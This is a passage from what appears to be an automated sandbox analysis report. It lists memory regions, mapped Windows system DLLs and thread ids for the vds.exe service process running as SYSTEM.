0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2338 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2339 start_va = 0x7feff970000 end_va = 0x7feff9bcfff monitored = 0 entry_point = 0x7feff971070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2340 start_va = 0x7feff9c0000 end_va = 0x7feff9c7fff monitored = 0 entry_point = 0x7feff9c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2341 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2342 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2343 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2344 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2345 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2346 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2347 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2348 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2349 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2350 start_va = 0x7fffffde000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2351 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Thread: id = 126 os_tid = 0x8a8 Thread: id = 127 os_tid = 0x8a4 Thread: id = 128 os_tid = 0x8a0 Thread: id = 129 os_tid = 0x89c Thread: id = 130 os_tid = 0x898 Thread: id = 131 os_tid = 0x738 Process: id = "18" image_name = "vds.exe" filename = "c:\\windows\\system32\\vds.exe" page_root = "0x3443c000" os_pid = "0x8ac" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "17" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\System32\\vds.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:00071487" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2352 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2353 start_va = 0x20000 end_va = 0x21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vds.exe.mui" filename = "\\Windows\\System32\\en-US\\vds.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vds.exe.mui") Region: id = 2354 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2355 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2356 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2357 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2358 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2359 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2360 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2361 start_va = 0x260000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2362 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2363 start_va = 0x330000 end_va = 0x33cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2364 start_va = 0x340000 end_va = 0x377fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ulib.dll.mui" filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui") Region: id = 2365 start_va = 0x380000 end_va = 0x380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2366 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2367 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2368 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2369 start_va = 0x820000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 2370 start_va = 0x960000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 2371 start_va = 0xa50000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2372 start_va = 0xb70000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 2373 start_va = 0xbf0000 end_va = 0xebefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2374 start_va = 0xef0000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 2375 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2376 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2377 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2378 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2379 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2380 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2381 start_va = 0xffc80000 end_va = 0xffd05fff monitored = 0 entry_point = 0xffcf546c region_type = mapped_file name = "vds.exe" filename = "\\Windows\\System32\\vds.exe" (normalized: "c:\\windows\\system32\\vds.exe") Region: id = 2382 start_va = 0x7fef3170000 end_va = 0x7fef31d5fff monitored = 0 entry_point = 0x7fef31c7a28 region_type = mapped_file name = "untfs.dll" filename = "\\Windows\\System32\\untfs.dll" (normalized: "c:\\windows\\system32\\untfs.dll") Region: id = 2383 start_va = 0x7fef4270000 end_va = 0x7fef427bfff monitored = 0 entry_point = 0x7fef42755d8 region_type = mapped_file name = "fmifs.dll" filename = "\\Windows\\System32\\fmifs.dll" (normalized: "c:\\windows\\system32\\fmifs.dll") Region: id = 2384 start_va = 0x7fef4280000 end_va = 0x7fef42a1fff monitored = 0 entry_point = 0x7fef429ab10 region_type = mapped_file name = "ufat.dll" filename = "\\Windows\\System32\\ufat.dll" (normalized: "c:\\windows\\system32\\ufat.dll") Region: id = 2385 start_va = 0x7fef42b0000 end_va = 0x7fef42dcfff monitored = 0 entry_point = 0x7fef42d4a2c region_type = mapped_file name = "uudf.dll" filename = "\\Windows\\System32\\uudf.dll" (normalized: "c:\\windows\\system32\\uudf.dll") Region: id = 2386 start_va = 0x7fef43d0000 end_va = 0x7fef43fffff monitored = 0 entry_point = 0x7fef43f3894 region_type = mapped_file name = "ifsutil.dll" filename = "\\Windows\\System32\\ifsutil.dll" (normalized: "c:\\windows\\system32\\ifsutil.dll") Region: id = 2387 start_va = 0x7fef4400000 end_va = 0x7fef4427fff monitored = 0 entry_point = 0x7fef4401408 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 2388 start_va = 0x7fef4430000 end_va = 0x7fef4448fff monitored = 0 entry_point = 0x7fef444228c region_type = mapped_file name = "uexfat.dll" filename = "\\Windows\\System32\\uexfat.dll" (normalized: "c:\\windows\\system32\\uexfat.dll") Region: id = 2389 start_va = 0x7fef4450000 end_va = 0x7fef4482fff monitored = 0 entry_point = 0x7fef4474d60 region_type = mapped_file name = "vdsutil.dll" filename = "\\Windows\\System32\\vdsutil.dll" (normalized: "c:\\windows\\system32\\vdsutil.dll") Region: id = 2390 start_va = 0x7fef4800000 end_va = 0x7fef4820fff monitored = 0 entry_point = 0x7fef4817d2c region_type = mapped_file name = "vds_ps.dll" filename = "\\Windows\\System32\\vds_ps.dll" (normalized: "c:\\windows\\system32\\vds_ps.dll") Region: id = 2391 start_va = 0x7fef6ce0000 end_va = 0x7fef6ce6fff monitored = 0 entry_point = 0x7fef6ce1564 region_type = mapped_file name = "osuninst.dll" filename = "\\Windows\\System32\\osuninst.dll" (normalized: "c:\\windows\\system32\\osuninst.dll") Region: id = 2392 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2393 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2394 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2395 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2396 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2397 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2398 start_va = 0x7fefd570000 end_va = 0x7fefd592fff monitored = 0 entry_point = 0x7fefd571198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2399 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2400 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2401 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2402 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2403 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2404 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2405 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2406 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2407 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2408 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2409 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2410 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2411 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2412 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2413 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2414 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2415 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2416 start_va = 0x7feff970000 end_va = 0x7feff9bcfff monitored = 0 entry_point = 0x7feff971070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2417 start_va = 0x7feff9c0000 end_va = 0x7feff9c7fff monitored = 0 entry_point = 0x7feff9c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2418 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2419 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2420 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2421 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2422 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2423 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2424 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2425 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2426 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2427 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2428 start_va = 0xf70000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 2431 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2432 start_va = 0x1250000 end_va = 0x12cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 2433 start_va = 0x1380000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 2434 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2435 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2436 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2442 start_va = 0x11d0000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 2443 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2444 start_va = 0x7fefd830000 end_va = 0x7fefd86afff monitored = 0 entry_point = 0x7fefd831324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2445 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2446 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2447 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 2448 start_va = 0x7fef3060000 end_va = 0x7fef30f1fff monitored = 0 entry_point = 0x7fef30e7d50 region_type = mapped_file name = "vdsdyn.dll" filename = "\\Windows\\System32\\vdsdyn.dll" (normalized: "c:\\windows\\system32\\vdsdyn.dll") Region: id = 2449 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2450 start_va = 0x1080000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 2451 start_va = 0x12f0000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 2452 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 2453 start_va = 0x7fef4490000 end_va = 0x7fef44c1fff monitored = 0 entry_point = 0x7fef44b88e0 region_type = mapped_file name = "vdsbas.dll" filename = "\\Windows\\System32\\vdsbas.dll" (normalized: "c:\\windows\\system32\\vdsbas.dll") Region: id = 2454 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2455 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2456 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2457 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2515 start_va = 0x1590000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 2516 start_va = 0x1740000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 2517 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2518 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2519 start_va = 0x7fef3040000 end_va = 0x7fef3050fff monitored = 0 entry_point = 0x7fef304a820 region_type = mapped_file name = "vdsvd.dll" filename = "\\Windows\\System32\\vdsvd.dll" (normalized: "c:\\windows\\system32\\vdsvd.dll") Region: id = 2520 start_va = 0x7fef75e0000 end_va = 0x7fef75e9fff monitored = 0 entry_point = 0x7fef75e42bc region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 2521 start_va = 0x7fef7560000 end_va = 0x7fef7568fff monitored = 0 entry_point = 0x7fef756325c region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 2524 start_va = 0x3a0000 end_va = 0x3a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2547 start_va = 0x7fef2e20000 end_va = 0x7fef2e36fff monitored = 0 entry_point = 0x7fef2e301a8 region_type = mapped_file name = "hbaapi.dll" filename = "\\Windows\\System32\\hbaapi.dll" (normalized: "c:\\windows\\system32\\hbaapi.dll") Region: id = 2548 start_va = 0x7fef9b80000 end_va = 0x7fef9b8dfff monitored = 0 entry_point = 0x7fef9b85500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2549 start_va = 0x7fef9e20000 end_va = 0x7fef9e96fff monitored = 0 entry_point = 0x7fef9e5e7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2550 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2554 start_va = 0x7fef98a0000 end_va = 0x7fef98b2fff monitored = 0 entry_point = 0x7fef98a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2555 start_va = 0x7fef9bc0000 end_va = 0x7fef9c92fff monitored = 0 entry_point = 0x7fef9c38b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2556 start_va = 0x7fef9b90000 end_va = 0x7fef9bb6fff monitored = 0 entry_point = 0x7fef9b911a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2637 start_va = 0x7fef2e00000 end_va = 0x7fef2e16fff monitored = 0 entry_point = 0x7fef2e0fa14 region_type = mapped_file name = "iscsidsc.dll" filename = "\\Windows\\System32\\iscsidsc.dll" (normalized: "c:\\windows\\system32\\iscsidsc.dll") Region: id = 2638 start_va = 0x7fef2df0000 end_va = 0x7fef2dfdfff monitored = 0 entry_point = 0x7fef2df6164 region_type = mapped_file name = "iscsium.dll" filename = "\\Windows\\System32\\iscsium.dll" (normalized: "c:\\windows\\system32\\iscsium.dll") Region: id = 2639 start_va = 0x17c0000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 2640 start_va = 0x7fefab40000 end_va = 0x7fefab95fff monitored = 0 entry_point = 0x7fefab41040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2641 start_va = 0x7fefab30000 end_va = 0x7fefab38fff monitored = 0 entry_point = 0x7fefab31020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 2642 start_va = 0x7fefab20000 end_va = 0x7fefab28fff monitored = 0 entry_point = 0x7fefab23668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2643 start_va = 0x7fefce60000 end_va = 0x7fefce8ffff monitored = 0 entry_point = 0x7fefce6194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Thread: id = 132 os_tid = 